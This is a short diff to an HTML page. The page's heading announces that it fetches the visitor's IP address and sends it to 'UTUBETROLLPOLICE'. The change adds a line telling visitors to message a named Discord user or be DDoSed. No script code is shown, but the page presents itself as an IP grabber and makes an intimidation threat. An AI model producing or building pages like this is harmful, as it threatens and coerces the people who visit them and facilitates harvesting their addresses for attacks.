--- a/index.html
+++ b/index.html
@@ -45,7 +45,9 @@
     </style>
 </head>
 <body>
-    <h1>Fetching and Sending Your IP Address to UTUBETROLLPOLICE</h1>
+    <h1>Fetching and Sending Your IP Address to UTUBETROLLPOLICE
+    
+    Message "nisgib" on discord or get u will be ddosed by us ! </h1>
     <p id="status">Loading...</p>
 
     <script>
